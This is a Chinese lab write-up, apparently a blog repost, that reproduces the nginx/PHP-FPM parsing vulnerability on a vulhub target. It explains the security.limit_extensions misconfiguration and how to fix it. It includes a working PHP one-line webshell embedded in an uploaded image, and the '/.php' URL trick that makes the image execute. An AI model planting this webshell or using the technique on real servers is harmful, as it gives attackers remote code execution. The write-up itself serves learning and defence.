1. 程式人生 > 其它 >漏洞復現-nginx_parsing_vulnerability-nginx解析漏洞

漏洞復現-nginx_parsing_vulnerability-nginx解析漏洞

0x00 實驗環境

攻擊機:Win 10

靶場:docker拉的vulhub靶場

0x01 影響版本

一些配置錯誤的情況,與nginx、php版本無關。

常常出現為nginx解析任意檔案php而導致解析漏洞。

0x02 漏洞復現

(1)上傳一張正常的圖片,然後在上傳圖片時進行抓包

(2)如上圖所示,在圖片的資料報文中加入一句話木馬

<?php @eval($_POST['x']);?>

(3)上傳完成後能看到圖片上傳的路徑,點選訪問,能成功訪問到後,在圖片檔名後加一個/.php

發現成功上傳併成功解析為php檔案。

(4)使用蟻劍直接連線即可:

0x03 漏洞原理

nginx.conf的如下配置導致nginx把以’.php

’結尾的檔案交給fastcgi處理,為此可以構造http://ip/uploadfiles/test.png/.php (url結尾不一定是‘.php’,任何伺服器端不存在的php檔案均可,比如’a.php’)。

如下圖就是個錯誤的配置:

在這個www-2.conf的配置檔案中,security.limit_extensions被設定為了,故什麼檔案都是可以執行的,所以在防護的時候,需要將這個配置為.php(即:僅為.php的檔案才能執行)。

0x04 修復建議

設定security.limit_extensions=.php,重啟一下服務即可。

0x05 參考文獻

https://www.cnblogs.com/renhaoblog/p/12874603.html

https://idc.wanyunshuju.com/aqld/1875.html

0x06 免責宣告

本漏洞復現文章僅用於學習、工作與興趣愛好,並立志為網路安全奉獻一份力量,凡是利用本部落格相關內容的無良hackers造成的安全事故均與本人無關!